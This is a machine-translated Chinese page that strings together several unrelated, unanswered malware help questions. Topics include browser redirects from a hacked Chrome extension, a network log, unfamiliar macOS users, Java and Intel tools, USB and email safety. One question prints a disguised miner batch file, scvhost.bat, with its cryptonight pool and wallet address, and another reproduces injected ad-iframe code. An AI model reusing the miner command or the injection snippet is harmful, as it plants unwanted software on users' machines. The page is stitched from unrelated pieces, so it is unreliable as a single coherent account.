标签: malware

我好像被恶意软件感染了。具体来说，时不时（通常每隔几天）我会被重定向到一个页面，要求我下载一些东西，通常是“新版本的 Flash”。据推测，它不是那种类型，但实际上是某种病毒或木马。

我google-chrome在 Debian Linux 上使用版本 30.0.1599.114，我很确定这是由扩展引起的。我知道我可以简单地卸载我的扩展程序或删除我的~/.config/google-chrome文件夹，但我宁愿不这样做。我想确定导致此问题的扩展名并仅删除该扩展名。

在尝试调试这个（感谢@Braiam）时，我检查了事件记录器chrome://net-internals/#events并搜索了我被重定向到的 URL 之一：

内容如下chrome://net-internals/#events：

122667: URL_REQUEST
http://cdn.adnxs.com/p/d9/32/a3/72/d932a372371bd0a47ba7e2a73649a8d0.swf?clickTag=http%3A%2F%2Ffra1.ib.adnxs.com%2Fclick%3FSRPvAE9aoD_c-TxO6i6ZP-kmMQisHO4_3Pk8TuoumT9JE-8AT1qgP3vmRkLiiPF6ljpJTzhxcH-5rRRTAAAAABwgIwByBwAAPwEAAAIAAADRAMMAVqgFAAAAAQBVU0QAVVNEANgCWgDHsgAAFIsAAQUCAQIAAIwAeiTtsAAAAAA.%2Fcnd%3D%2521NgbzOgjzkMEBENGBjAYY1tAWIAA.%2Freferrer%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fif%253Fenc%253DgbdAguLHaD8eqb7zixJkP_LSTWIQWOk_Hqm-84sSZD-At0CC4sdoP2mCZbZYUNUFljpJTzhxcH-3rRRTAAAAAJL-IgB2AgAAUAMAAAIAAAA9ocQAN0sEAAAAAQBVU0QAVVNEANgCWgD8ogAA58sAAgUCAQIAAIwA9idtvAAAAAA.%2Fclickenc%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fclick%253FXkiHhzB-Wj-D_TJz3IRWP3E9CtejcNU_g_0yc9yEVj9eSIeHMH5aP_ygL0YyHDQoljpJTzhxcH-2rRRTAAAAAEJLIQBJAQAAVwMAAAIAAACL0cUA0WAFAAAAAQBVU0QAVVNEANgCWgDQMgAAUdQDAQUCAQIAAIwA3yN4YgAAAAA.%252Fcnd%253D%25218gXSNwiT18QBEIujlwYY0cEVIAA.%252Freferrer%253Dhttp%253A%252F%252Fwww.imgclck.com%252Fserve%252Fimgclck.php%252Fclickenc%253Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Ft%252F9164%252F15602%252F101258-2.3581666.3755480%253Furl%253Dhttp%25253A%25252F%25252Fwww.downloadchop.com%25252Fgo%25252Flightspark%25253Fsource%25253Dybrant_lightspark-fr%252526adprovider%25253Dybrant%252526ce_cid%25253Dfra1CJb1pPqEp5y4fxACGPvMm5KknOL4eiINODIuMjI5LjIyLjE2NigBMLnb0pgF%252526subid%25253D2301980
Start Time: 2014-03-03 17:28:41.358

t=1393864121358 [st=  0] +REQUEST_ALIVE  [dt=334]
t=1393864121359 [st=  1]   +URL_REQUEST_START_JOB  [dt=332]
                            --> load_flags = 134349184 (ENABLE_LOAD_TIMING | ENABLE_UPLOAD_PROGRESS | MAYBE_USER_GESTURE | VERIFY_EV_CERT)
                            --> method = "GET"
                            --> priority = 2
                            --> url = "http://cdn.adnxs.com/p/d9/32/a3/72/d932a372371bd0a47ba7e2a73649a8d0.swf?clickTag=http%3A%2F%2Ffra1.ib.adnxs.com%2Fclick%3FSRPvAE9aoD_c-TxO6i6ZP-kmMQisHO4_3Pk8TuoumT9JE-8AT1qgP3vmRkLiiPF6ljpJTzhxcH-5rRRTAAAAABwgIwByBwAAPwEAAAIAAADRAMMAVqgFAAAAAQBVU0QAVVNEANgCWgDHsgAAFIsAAQUCAQIAAIwAeiTtsAAAAAA.%2Fcnd%3D%2521NgbzOgjzkMEBENGBjAYY1tAWIAA.%2Freferrer%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fif%253Fenc%253DgbdAguLHaD8eqb7zixJkP_LSTWIQWOk_Hqm-84sSZD-At0CC4sdoP2mCZbZYUNUFljpJTzhxcH-3rRRTAAAAAJL-IgB2AgAAUAMAAAIAAAA9ocQAN0sEAAAAAQBVU0QAVVNEANgCWgD8ogAA58sAAgUCAQIAAIwA9idtvAAAAAA.%2Fclickenc%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fclick%253FXkiHhzB-Wj-D_TJz3IRWP3E9CtejcNU_g_0yc9yEVj9eSIeHMH5aP_ygL0YyHDQoljpJTzhxcH-2rRRTAAAAAEJLIQBJAQAAVwMAAAIAAACL0cUA0WAFAAAAAQBVU0QAVVNEANgCWgDQMgAAUdQDAQUCAQIAAIwA3yN4YgAAAAA.%252Fcnd%253D%25218gXSNwiT18QBEIujlwYY0cEVIAA.%252Freferrer%253Dhttp%253A%252F%252Fwww.imgclck.com%252Fserve%252Fimgclck.php%252Fclickenc%253Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Ft%252F9164%252F15602%252F101258-2.3581666.3755480%253Furl%253Dhttp%25253A%25252F%25252Fwww.downloadchop.com%25252Fgo%25252Flightspark%25253Fsource%25253Dybrant_lightspark-fr%252526adprovider%25253Dybrant%252526ce_cid%25253Dfra1CJb1pPqEp5y4fxACGPvMm5KknOL4eiINODIuMjI5LjIyLjE2NigBMLnb0pgF%252526subid%25253D2301980"
t=1393864121359 [st=  1]      HTTP_CACHE_GET_BACKEND  [dt=0]
t=1393864121359 [st=  1]      HTTP_CACHE_OPEN_ENTRY  [dt=0]
                              --> net_error = -2 (ERR_FAILED)
t=1393864121359 [st=  1]      HTTP_CACHE_CREATE_ENTRY  [dt=0]
t=1393864121359 …

我不在Linux 上运行防病毒软件（大多数人我都没有 AFAIK），而且我一点也不担心任何形式的恶意软件或间谍软件或任何 other_bad_ware。

我应该担心吗？

当然，我不是以 root 身份运行的。

我注意到我的系统今天运行缓慢，并检查了终端中的系统用户列表作为预防措施。我发现了几个我不认识的用户。我应该担心吗？

_applepay
_captiveagent
_ctkd
_datadetectors
_findmydevice
_gamecontrollerd
_hidd
_mbsetupuser
_mobileasset
_ondemand
_pcastagent
_pcastlibrary
_pcastserver
_wwwproxy
_xgridagent
_xgridcontroller
_xserverdocs

当一个奇怪的横幅出现时，我正在开发我的网站。首先我认为这是我的错，然后是网络主机提供商的错，现在我不知道这是从哪里来的。

我知道它看起来很丑并且会影响我访问的所有页面。看看 StackOverflow 的页脚是怎样的：

代码本身没有出现在“查看页面源代码”中，但是当我从“检查元素”中查看它并查看呈现的 html 时，它就会出现。有更多的 div 但其中一些是空的。这里有很多外国代码。这是主要的：

<div id="op_ad">
<br>
  <center>
    <iframe src="http://www.games-free-apps.com/games/b.html" style="border:none;width:310px;height:255px;overflow:hidden;" frameborder="0" marginheight="0" marginwidth="0">
    <!-- MORE CODE HERE -->
    </iframe>
  </center>
</div>

以及更详细的侵入性代码截图，这次来自我的网站：

那么，这是 Chrome 的错误，我以某种方式破坏了（我从未见过这些代码段）还是恶意软件？知道如何修复它吗？

我在 Ubuntu 中使用 Google Chrome 版本 21.0.1180.89（来自官方页面）。

编辑：我开始了一个维基答案。请将您被黑的扩展程序添加到列表中。我将向 Google 发送一封电子邮件以通知他们，但我认为他们可能已经知道了。

我在网上环顾四周，似乎找不到关于 Java 新帮助工具是什么的那么多信息。我在 SE 上找到了另一个线程， 但它并没有解释那么多。它是否提供膨胀软件并试图让您下载它们？

我正在更新 Java，它提示我使用我的管理员帐户登录以安装 Java 的新帮助工具。有没有其他人遇到过这个问题？如果是这样，您是否找到了卸载它的方法或将其保留在您的机器上。

我正在安装 Windows 10 并删除英国媒体报道。

Intel Security Assist 有什么作用，为什么要安装它？此外，（如何）它与 IME 相关，相信它提供/促进向操作系统提供后门是否合理。（近一年后，我仍然无法在谷歌中找到任何有意义的信息）

更新- 此问题已被查看超过 26000 次，并且是寻找但没有有意义的答案时的第一个结果之一，所以我增加了悬赏。

旧更新 - 下面有一些答案确认了它是 IME 平台的一部分，但这确实解释了该程序的好处/效用是什么（特别是对用户而言）。

假设您在街上找到一个 USB 驱动器，并且希望 100% 确定它没有被篡改，无论是通过软件还是修改其硬件（添加或修改组件等），以便零风险恶意软件。

完全格式化它是否足以 100% 确定没有恶意软件残留？如果是这样，使用 Tails 3.2 中的“磁盘工具”中的标准慢速进程完全格式化它是否足以做到这一点？

假设攻击者具有最高的技术能力。不仅仅是合理或合理的场景。

假设我收到一封我高度怀疑是某种形式的垃圾邮件的电子邮件，但我不能 100% 确定。还假设我正在使用具有良好垃圾邮件过滤器的网络邮件形式（如 Gmail），但此邮件已安全通过。

显然我不应该打开任何附件，但是这封电子邮件是否可以安全打开？如果没有，是否有一种简单的方法可以安全地打开它？

我刚刚找到了这个名为 scvhost.bat 的 .bat 文件。该文件中有以下内容：

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

这是病毒（窃取信息等）还是种植矿工？我很担心，因为我也涉足加密货币，并且stratum是上述文件中提到的货币。

默认情况下，大多数电子邮件客户端不会在电子邮件内容中显示图像。

但我还不明白这一点。显示图像作业如何攻击计算机？